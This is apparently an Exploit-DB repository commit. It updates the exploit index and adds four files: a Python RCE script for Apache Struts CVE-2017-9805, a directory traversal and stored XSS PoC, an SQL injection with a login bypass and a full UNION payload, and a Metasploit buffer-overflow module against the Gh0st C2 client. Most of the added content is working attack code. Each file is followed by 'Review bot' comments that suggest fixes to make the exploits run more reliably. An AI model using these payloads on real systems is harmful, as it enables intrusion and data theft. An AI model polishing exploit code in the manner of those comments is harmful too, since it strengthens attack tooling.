DB: 2017-09-08
4 new exploits Tor - Linux Sandbox Breakout via X11 Tor (Linux) - X11 Linux Sandbox Breakout Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution Gh0st Client - Buffer Overflow (Metasploit) TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting Online Invoice System 3.0 - SQL Injection
This commit is contained in:
parent
a1eeba1263
commit
67b3da92e4
5 changed files with 311 additions and 2 deletions
|
@ -9230,7 +9230,7 @@ id,file,description,date,author,platform,type,port
|
|||
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
|
||||
42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
|
||||
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
|
||||
42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0
|
||||
42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15795,6 +15795,8 @@ id,file,description,date,author,platform,type,port
|
|||
42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
|
||||
42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
|
||||
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
|
||||
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
|
||||
42630,platforms/windows/remote/42630.rb,"Gh0st Client - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -38202,7 +38204,7 @@ id,file,description,date,author,platform,type,port
|
|||
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
|
||||
42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
|
||||
42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root",2017-05-30,"Simone Margaritelli",php,webapps,8181
|
||||
42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution",2017-05-30,"Simone Margaritelli",php,webapps,8181
|
||||
42094,platforms/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",php,webapps,0
|
||||
42095,platforms/php/webapps/42095.txt,"OV3 Online Administration 3.0 - Directory Traversal",2017-05-31,LiquidWorm,php,webapps,0
|
||||
42096,platforms/php/webapps/42096.txt,"OV3 Online Administration 3.0 - Remote Code Execution",2017-05-31,LiquidWorm,php,webapps,0
|
||||
|
@ -38408,3 +38410,5 @@ id,file,description,date,author,platform,type,port
|
|||
42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
|
||||
42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
|
||||
42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0
|
||||
42628,platforms/php/webapps/42628.txt,"Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps,0
|
||||
42629,platforms/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
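--- a/platforms/linux/remote/42627.py
+++ b/platforms/linux/remote/42627.py
@@ -0,0 +1,97 @@
+# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
+# Google Dork: filetype:action
+# Date: 06/09/2017
+# Exploit Author: Warflop
+# Vendor Homepage: https://struts.apache.org/
+# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
+# Version: Struts 2.5 – Struts 2.5.12
+# Tested on: Struts 2.5.10
+# CVE : 2017-9805
+
+#!/usr/bin/env python3
+# coding=utf-8
+# *****************************************************
+# Struts CVE-2017-9805 Exploit
+# Warflop (http://securityattack.com.br/)
+# Greetz: Pimps & G4mbl3r
+# *****************************************************
+import requests
+import sys
+
+def exploration(command):
+
+exploit = '''
+<map>
+<entry>
+<jdk.nashorn.internal.objects.NativeString>
+<flags>0</flags>
+<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+<dataHandler>
+<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+<is class="javax.crypto.CipherInputStream">
+<cipher class="javax.crypto.NullCipher">
+<initialized>false</initialized>
+<opmode>0</opmode>
+<serviceIterator class="javax.imageio.spi.FilterIterator">
+<iter class="javax.imageio.spi.FilterIterator">
+<iter class="java.util.Collections$EmptyIterator"/>
+<next class="java.lang.ProcessBuilder">
+<command>
+<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
+</command>
+<redirectErrorStream>false</redirectErrorStream>
+</next>
+</iter>
+<filter class="javax.imageio.ImageIO$ContainsFilter">
+<method>
+<class>java.lang.ProcessBuilder</class>
+<name>start</name>
+<parameter-types/>
+</method>
+<name>foo</name>
+</filter>
+<next class="string">foo</next>
+</serviceIterator>
+<lock/>
+</cipher>
+<input class="java.lang.ProcessBuilder$NullInputStream"/>
+<ibuffer/>
+<done>false</done>
+<ostart>0</ostart>
+<ofinish>0</ofinish>
+<closed>false</closed>
+</is>
+<consumed>false</consumed>
+</dataSource>
+<transferFlavors/>
+</dataHandler>
+<dataLen>0</dataLen>
+</value>
+</jdk.nashorn.internal.objects.NativeString>
+<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+</entry>
+<entry>
+<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+</entry>
+</map>
+'''
+
+
+url = sys.argv[1]
+
+headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
+'Content-Type': 'application/xml'}
+
+request = requests.post(url, data=exploit, headers=headers)
+print request.text
+
+if len(sys.argv) < 3:
+print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
+print ('[*] Warflop - http://securityattack.com.br')
+print ('[*] Greatz: Pimps & G4mbl3r')
+print ('[*] Use: python struts2.py URL COMMAND')
+print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
+exit(0)
+else:
+exploration(sys.argv[2])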
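Review bot: `print request.text` (the line after the `requests.post` call in `exploration`) is Python 2 print-statement syntax, but the file's shebang is `#!/usr/bin/env python3`, so under the interpreter it asks for the script dies with a SyntaxError before sending anything; change it to `print(request.text)`. The command is spliced raw into the XML `<string>` element, so any command containing `<`, `>` or `&` yields malformed XML that the server rejects rather than executes — escape it with `xml.sax.saxutils.escape(command)` or document the restriction in the usage text. `requests.post` has no `timeout`, so a host that accepts the connection and never answers hangs the run indefinitely; `requests.post(url, data=exploit, headers=headers, timeout=15)` would bound it. The shebang also sits after nine comment lines rather than on line 1, so it is not honoured when the file is executed directly.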
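--- a/platforms/php/webapps/42628.txt
+++ b/platforms/php/webapps/42628.txt
@@ -0,0 +1,44 @@
+# Exploit Title: HRM - Workable Zone : Ultimate HR System <= 1.2 - Unauthenticated Directory Traversal / Stored XSS
+# Date: 2017-09-05
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://workablezone.com
+# Software Link: https://codecanyon.net/item/hrm-workable-zone-ultimate-hr-system/20182372
+# Version: 1.2
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-05
+
+Product & Service Introduction:
+===============================
+Workable Zone is probably one of most customizable Human resourse(HR) management software for companies of all sizes.
+
+Technical Details & Description:
+================================
+
+Multiple Stored XSS vulnerabilities found.
+
+Directory Traversal vulnerability can disclose sensitive files.
+
+Proof of Concept (PoC):
+=======================
+
+Stored XSS:
+
+Logged as Employee:
+
+Write your payload on:
+Profile > Last Name
+
+Other vulnerable fields include: First Name, Contact Number
+
+Unauthenticated Directory Traversal:
+
+http://localhost.com/download?type=document&filename=../../../../../etc/passwd
+
+Credits & Authors:
+==================
+8bitsec - [https://twitter.com/_8bitsec]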
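Review bot: The stored-XSS section (Profile > Last Name, plus First Name and Contact Number) never says where the stored payload renders or who views it, and the severity rests entirely on that: a field that only echoes back to the employee who set it is self-XSS, whereas one rendered in the HR or admin view is an employee-to-admin session compromise, so add a line such as `Payload executes when an administrator opens the employee list / profile page`, or whatever was actually observed. The traversal PoC is a single URL with no expected response, so a reader cannot tell whether `filename` is used verbatim or how many `../` segments are really needed; state the observed HTTP status and that the body contained `root:x:0:0:` (or equivalent). The `type=document` parameter is shown but not explained — say whether other values of `type` reach the same file read. No vendor notification date or fixed version is recorded either.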
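--- a/platforms/php/webapps/42629.txt
+++ b/platforms/php/webapps/42629.txt
@@ -0,0 +1,37 @@
+# # # # #
+# Exploit Title: Online Invoice System 3.0 - SQL Injection
+# Dork: N/A
+# Date: 07.09.2017
+# Vendor Homepage: http://www.onlineinvoicesystem.com/
+# Software Link: http://www.onlineinvoicesystem.com/index_v3.html
+# Demo: http://www.onlineinvoicesystem.com/onlineinvoicesystem3/index.php
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# Bypass
+# http://localhost/[PATH]/index.php
+# User: 'or 1=1 or ''=' Pass: anything
+# User: anything Pass: 'or 1=1 or ''='
+#
+# Sql
+# http://localhost/[PATH]/editclient.php?cid=[SQL]
+# -5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+-
+#
+# http://localhost/[PATH]/admin_invoice_print.php?id=[SQL]
+#
+# http://localhost/[PATH]/edit_invoice.php?id=[SQL]
+#
+# http://localhost/[PATH]/admin_invoice.php?id=[SQL]
+# Etc...
+# # # # #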
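Review bot: The PoC gives one full payload under `editclient.php?cid=` and only `[SQL]` placeholders for the other three endpoints, without stating the DBMS, the column count the union depends on, or which part of the page the `export_set` output lands in, so the entry cannot be adapted to `admin_invoice_print.php`, `edit_invoice.php` or `admin_invoice.php` without re-deriving everything; the `/*!00003uNiOn*/` versioned comments only make sense against MySQL, which should be said outright. The login bypass is given as `User: 'or 1=1 or ''=' Pass: anything` with no form field names or request method, so a reader must guess which POST parameters of `index.php` are concatenated into the query. Say whether the `admin_*.php` pages require a session — they look admin-only from the name, but that is not stated — since it decides whether these are pre- or post-auth. The description `allows an attacker to inject sql commands....` should name the vulnerable parameters (`cid`, `id`) instead of leaving it to the URLs.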
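--- a/platforms/windows/remote/42630.rb
+++ b/platforms/windows/remote/42630.rb
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zlib'
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::Tcp
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Gh0st Client buffer Overflow',
+'Description' => %q{
+This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
+},
+'Author' => 'Professor Plum',
+'License' => MSF_LICENSE,
+'References' =>
+[
+],
+'DefaultOptions' =>
+{
+'EXITFUNC' => 'thread',
+'AllowWin32SEH' => true
+},
+'Payload' =>
+{
+'Space' => 1000,
+'BadChars' => '',
+'EncoderType' => Msf::Encoder::Type::AlphanumMixed
+},
+'Platform' => 'win',
+'DisclosureDate' => 'Jul 27 2017',
+'Targets' =>
+[
+['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
+],
+'Privileged' => false,
+'DefaultTarget' => 0))
+
+register_options(
+[
+OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
+Opt::RPORT(80)
+]
+)
+end
+
+def make_packet(id, data)
+msg = id.chr + data
+compressed = Zlib::Deflate.deflate(msg)
+datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
+end
+
+def validate_response(data)
+if data.nil?
+print_status('Server closed connection')
+return false
+end
+if data.empty?
+print_status('No response recieved')
+return false
+end
+if data.size < 13
+print_status('Invalid packet')
+print_status(data)
+return false
+end
+mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
+if mag.index(datastore['MAGIC']) != 0
+print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
+return false
+end
+if pktlen != data.size
+print_status('Packet size mismatch')
+return false
+end
+msg = Zlib::Inflate.inflate(data[13..data.size])
+if msg.size != msglen
+print_status('Packet decompress failure')
+return false
+end
+return true
+end
+
+def check
+connect
+sock.put(make_packet(101, "\x00")) # heartbeat
+if validate_response(sock.get_once || '')
+return Exploit::CheckCode::Appears
+end
+Exploit::CheckCode::Safe
+end
+
+def exploit
+print_status("Trying target #{target.name}")
+print_status('Spraying heap...')
+for i in 0..100
+connect
+sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
+if not validate_response(sock.get_once)
+disconnect
+return
+end
+end
+
+for i in 103..107
+print_status("Trying command #{i}...")
+begin
+connect
+sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
+sock.put(sploit)
+if validate_response(sock.get_once)
+next
+end
+sleep(0.1)
+break
+rescue EOFError
+print_status('Invalid')
+end
+end
+handler
+disconnect
+end
+end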
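Review bot: `make_packet` and `validate_response` hard-code a 13-byte header (`13 + compressed.size`, `data[13..data.size]`) while `MAGIC` is a free-form `OptString` whose description merely says "5 char", so any other length silently mis-frames every packet and the `'a' + datastore['MAGIC'].size.to_s + 'VV'` unpack disagrees with the slice; derive it once, `hdr = datastore['MAGIC'].size + 8`, and use `hdr` in both places, or reject other lengths with `fail_with(Failure::BadConfig, 'MAGIC must be 5 bytes')` at the top of `check` and `exploit`. `Zlib::Inflate.inflate` on the reply is unguarded, so a malformed or deliberately corrupt response from the C2 raises `Zlib::Error` out of `check` instead of returning `Safe`, and the length field is trusted without a cap, so the server can also make the module inflate as much as it likes; wrap it in `rescue Zlib::Error` returning false and bound `msglen`. `'References' => []` is empty even though a `DisclosureDate` of Jul 27 2017 is given, so the write-up it refers to should be cited. The spray loop calls `connect` 101 times without a matching `disconnect`, which looks intentional to keep the 4 MiB buffers resident on the target, but a comment saying so would stop the next reader "fixing" it; `recieved` in the status message is a typo.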